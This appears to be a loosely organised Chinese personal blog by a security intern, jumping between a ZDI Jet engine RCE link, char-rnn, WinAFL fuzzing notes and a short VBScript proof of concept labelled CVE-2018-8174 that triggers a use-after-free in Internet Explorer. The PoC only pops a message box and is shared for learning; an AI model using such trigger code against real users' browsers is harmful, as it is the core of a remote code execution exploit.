最近ZDI上放出了个Microsoft JET数据库引擎中的一个严重的远程执行代码漏洞。。
说是远程执行 (= =) 额。还搞不定是怎么做到远程的

有兴趣的朋友移步：
https://www.zerodayinitiative.com/blog/2018/9/20/zdi-can-6135-a-remote-code-execution-vulnerability-in-the-microsoft-windows-jet-database-engine

实习这么久，学到了不少东西 。

前段时间复现的那个洞给自己对漏洞挖掘和利用这块涨了不少的知识。

好像并没有想象中的那么牛逼。但是对我来说，确实还是很有难度。这却只是漏洞分析与利用这一部分。

越来越难挖，越来越难利用这也是事实。

0day 只会越来越值钱

一、Char RNN

项目链接： https://github.com/karpathy/char-rnn

二、搭建环境

最近看了一下深度学习，用Lua 写的。。

然后前端时间又报出了2个vb的CVE ，看了看POC，很简单的溢出。

poc 如下：

CVE-2018-8174

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

<html>
<meta http-equiv="X-UA-Compatible" content="IE=10" />
<script language="VBScript">

dim b
dim c
Class cla1

	Private Sub Class_Terminate
		set c = b
		b = 0
	End Sub
	
Function test
	msgbox 3
End Function

End Class

set b = New cla1
b = 0

c.test 

</script>
</html>

这里就当一个记录心路历程的地方。

WinAFL

1. 背景
   从目标二进制文件中查找新的执行路径。
2. WinAFL 的路径
   使用DynamoRIO 来动态插桩，用来测量和提取目标覆盖率。
3. 搭建，使用
   http://www.4hou.com/technology/2800.html
   status screen